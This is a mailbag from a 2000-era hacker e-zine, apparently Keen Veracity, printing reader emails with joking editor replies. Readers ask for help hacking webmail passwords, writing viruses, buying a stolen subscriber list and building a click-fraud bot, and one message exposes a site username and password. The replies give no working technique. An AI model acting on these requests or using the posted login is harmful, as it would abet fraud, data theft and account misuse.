---------- Date: Tue, 06 Jun 2000 01:40:30 -0400 From: Anthony R Tenkotte To: webmaster@legions.org Subject: Hacking Hey Web master i want to know it i can join your club or become an member and i would also like to ask you would you please tell me if any body on your member list has icq or aol instant messanger if any of them do whats their icq num or their screen name for aol instant messanger. I hope you reply with at least 3 good things if not oh well ill half to try again well i g2g bye. /* Uhm. We all use AOL. Really we do. BWAHAHA. No, really, everyone uses IRC, on undernet #legions. As far as ICQ goes, some use it, some don't. */ Date: Tue, 6 Jun 2000 14:20:08 -0400 From: Joe Cambareri To: digiebola@hackphreak.org Subject: Changing IP address Im looking for a way to change my IP address I use a cable modem through Optimum online and the external Terayon modem. Because of the cable modem my IP address remains the same whenever i open a site. Im not looking to change my IP address for illegal purposes. But if it is possible id like to hide the server i use (optimum online) and change my IP address. thank you if you can help me, otherwise thanks for your time. /* Sounds pretty illegal to me. You really need to figure out how your access is being granted, either DHCP or some other way, maybe a password in the cable modem? I would think it's safe to say, even if you did change your IP, your ISP will catch on, and then terminate your account. Be really careful. */ Date: Wed, 07 Jun 2000 01:49:09 -0500 From: siemeale To: digiebola@hackphreak.org Subject: request do you have game tempest 2000 /* What the hell is tempest 2000? */ Date: 8 Jun 00 11:34:30 MDT From: aaaaa aaaaa To: digiebola@hackphreak.org to Digital Ebola greetings, i am known as brief vegeta, and i have known you as a member of the underground i request to you, that if possible, please tell me how to be a member of the legion, like you are and no, im not just another nerd that's cursed by the world of hacking, i have my own abilities and would like to aid the lou thats all i have for this letter, good luck /* To mister quick vegetable: We at LoU appreciate the support, but if you would really like to aid us, you can please send us lots and lots of money, or write us a article for Keen Veracity. Money is preferred. */ te: Sun, 11 Jun 2000 06:25:38 PDT From: Jonathan Roe To: digiebola@hackphreak.org Subject: Question: Hey! Are you familiar with the AllAdvantage software that is used to trick it into thinking you are surfing? Do you think it would be possible to do something like that with ClickThru.com? (You can use my username: grey_rook and passwd: tikki to check it out without haaving to register.) Go to the "Surf" link and then click on one of the links that are listed. A Pop-up window comes up and once the page loads you can vote on how much you like the site to get the credit. You have to spend 30 seconds on each site. So, would it be possible to write a program that clicks on the "Next Site" link, waits 30 seconds, picks a random number (1 through 5) to vote and then clicks the "Next Site" and goes through the loop over and over again? I would prefer it be written in a Windoze compatible language or Linux would be OK, but I need help getting RedHat 5.2 to recognize COM5 (cua4). Email me back please on your ideas and if I can PLEASE get you to code it. If you are wondering why I want a program like this, I'm going to use it to get click throughs to the link that I provided on where to send other ClickThru.com members. That link is from an advertising company that allows blind links. I get 3 cents per click since it is a blind link so if you code the program, and it generates the 120 click throughs an hour, I would make $31536 a year. Not bad for someone who is a Junior in high school. Of course if you want to generate some extra cash along with me then that is expected. I just need a working copy of the program. Thanks! Jonathan /* 31536 BUCKS@!#$? */ To: digiebola@hackphreak.org Subject: t shirt!!! mom wants tshirt from rootfest!!! love mom /* Ah, you gotta love those moms who take pride in everything you do... */ To: digiebola@hackphreak.org Subject: hi t-shirt please ...love mom /* now, she is just getting to be annoying.... */ From: eric e To: digiebola@hackphreak.org Subject: FWD: Who is Jack Schitt? Parts/Attachments: 1 Shown 5 lines Text 2 Shown 2.3 KB Message, "FWD: Who is Jack Schitt?" 2.1 Shown 75 lines Text ---------------------------------------- Check this joke out!!! ---------- Original Message ---------------------------------- From: "Hailey Dawson" Date: Thu, 01 Jun 2000 21:43:19 CDT Who is Jack Schitt? The lineage is finally revealed. Many people are at a loss for a response when someone says; "You don't know Jack Schitt." Now you can intellectually handle the situation. Jack is the only son of Awe Schitt and O. Schitt. Awe Schitt, the fertilizer magnate, married O. Schitt, the owner of the Needeep N. Schitt, Inc. They had one son, Jack. In turn, Jack Schitt married Noe Schitt. They produced four children named Dip Schitt, Holie Schitt, Fulla Schitt, and Giva Schitt. However, after being married 15 years, Jack and Noe Schitt divorced. Noe Schitt later remarried Ted Sherlock and since her kids were living with her she wanted to keep her previous name. She was then known as Noe Schitt-Sherlock. Meanwhile, Dip Schitt married Loada Schitt and they produced a son of nervous disposition named Chicken Schitt. Two of Noe's four children, Fulla Schitt and Giva Schitt were inseparable throughout childhood and subsequently married the Happens brothers in a dual ceremony. The wedding announcement in the newspaper announced the Schitt- Happens wedding. The Schitt-Happens had four children named Dawg, Byrd, Hoarse, and Bull. Bull left home to tour the world and returned with his new Italian bride, Pisa Schitt. So, now when someone says, "You don't know Jack Schitt", you can correct them. Family history as recorded by Crock O. Schitt /* oh shit... */ Date: Sat, 17 Jun 2000 02:48:32 -0700 (PDT) From: Caesar Kidd To: deth@errata.net, digiebola@hackphreak.org, fejed@legions.org, lothos@rootfest.org, x-empt@ispep.cx, shadows@legions.org hi guys i need some help. i wanna to know how to open zipped file without using password recovery. i really need your help. i'm counting on you guys. thanx /* still counting? */ Date: Mon, 19 Jun 2000 12:43:53 +0200 From: Natalini To: digiebola@hackphreak.org Subject: Da Lucien I want subscribe to the your mailing list My e-mail is luciano46@hotmail.com /* Ok, 50 gigs of pr0n coming right up!!!! */ From: fejed To: digiebola@hackphreak.org Cc: digi@legions.org Subject: i don't have perm for mail i don't have permission for /var/mail/fejed on cyberspace7, resolve this. /* Thats strange, I can't read your nasty house wife sex stories, err I mean mail either.... */ Date: Fri, 23 Jun 2000 09:55:36 GMT From: VIKAS YADAV To: digiebola@hackphreak.org Subject: http://www.legions.org/members.html iam looking for hackers to get me the list of subscribers of www.indiainfoline.com. iam ready tp pay 250 - 300 $(american). If you can help then. please reply to me. otherwise please guide me to the person who can help me. thanking u in advance. for ur help. by the way iam also a hacker and my home page can be accessed at http://206.98.154.54 /* dude. it's gonna cost you *stick finger in mouth* 1 MILLION DOLLARS */ Date: Fri, 23 Jun 2000 01:50:05 -0700 From: JJ Allen Steelman To: digiebola@hackphreak.org Subject: help I got your mail from afriend if you know what your doing I am a rookie and need some teaching if you know anyone in the denver area contact me and help! Or if you can help will ove teh assist. Grifter /* sorry, please talk to fejed... */ Date: Wed, 28 Jun 2000 10:41:48 GMT From: max cipto To: digiebola@hackphreak.org hello... i'm max, 21 year old, indonesian, still study.. i'm a beginner. can you teach me how to write a virus? what program should i use? and anything about virus? how to hack hotmail or yahoo password ? i hope you can reply me email..? thank you very much... your student.. /* and the first lesson of today is to run your happy ass to the store and pick digi up a cold case of beer.... */ -------------------------------------------------------------------------------- S U B M I T T O K E E N V E R A C I T Y -------------------------------------------------------------------------------- NO! You do not have to be a member of Legions of the Underground to submit to KV. You can be a member of something else! Nobody is perfect! If you have a idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudice in any way shape or form, so even a AOLer's article may be published if it seems that it has clue. Or then again, maybe hell will freeze over! Anyones stuff maybe published, but we will never know if you don's submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is a equal opportunity destroyer. -------------------------------------------------------------------------------- All submissions to: digi@legions.org -------------------------------------------------------------------------------- IRC: Undernet #legions -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____| \_____/ \_____/ z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": www.legions.org z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* --------------------------------------------------------------------------------